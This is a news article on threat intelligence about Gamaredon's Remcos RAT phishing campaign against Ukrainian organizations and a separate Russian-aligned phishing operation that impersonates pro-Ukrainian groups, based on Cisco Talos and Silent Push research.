Ukrainian organizations are once again in the crosshairs of a phishing campaign distributing the Remcos RAT. A remote access trojan used for espionage and data theft. According to Cisco Talos, the attacks are believed to originate from Gamaredon. A Russian state-linked hacking group with a long history of targeting Ukraine.
The campaign uses war-related themes as bait. Specifically, the attackers embed Windows shortcut (LNK) files inside ZIP archives. Disguised to look like Microsoft Office documents referencing troop movements in Ukraine. These archives are likely delivered via phishing emails, aiming to trick recipients into opening them.
Once opened, the LNK files execute PowerShell scripts that reach out to geo-fenced servers in Russia and Germany. These servers host the next-stage payload—another ZIP archive containing a malicious DLL file, which is then executed via DLL side-loading. This technique allows the attackers to run a decrypted copy of Remcos RAT while displaying a decoy document to keep the victim unaware.
Cisco Talos researcher Guilherme Venere notes that the malicious files include Russian-language file names. A tactic that adds to the social engineering effort. The operation has been attributed with moderate confidence to Gamaredon. A group associated with Russia’s Federal Security Service (FSB) and also tracked under names like Primitive Bear, Trident Ursa, and UAC-0010.
Gamaredon has been active since at least 2013, primarily targeting Ukrainian government entities, NGOs, and military personnel. The group’s tactics are known to include rapid malware deployment. Simple phishing schemes, and consistent infrastructure reuse—traits also visible in this latest campaign.
The connection to Gamaredon was reinforced through analysis of two systems used to create the LNK files. These same machines have appeared in past attacks attributed to the group, offering a forensic link back to their infrastructure.
In parallel to this operation, researchers at Silent Push have uncovered another Russia-aligned phishing campaign. This time targeting pro-Ukrainian individuals within Russia. These campaigns use website impersonation and email forms to gather sensitive personal data under the guise of legitimate entities like the CIA, Russian Volunteer Corps, Legion Liberty, and the “I Want to Live” hotline for Russian soldiers seeking to surrender.
These fake websites, hosted on a bulletproof provider known as Nybula LLC, are designed to collect personal data, including political beliefs, physical fitness, and behavioral habits. The phishing forms utilize platforms like Google Forms and direct email interactions to extract this information from unsuspecting users.
Silent Push linked the four phishing clusters by their shared infrastructure and objective: data collection from individuals sympathetic to Ukraine, likely in an effort to identify, monitor, or pressure them.
While the tools and targets vary, both operations point to Russia-linked cyber actors intensifying information warfare tactics against Ukraine and its allies. From remote access trojans like Remcos to honeypot phishing sites impersonating Western intelligence agencies, the digital front of the Russo-Ukrainian war continues to evolve in sophistication and scale.
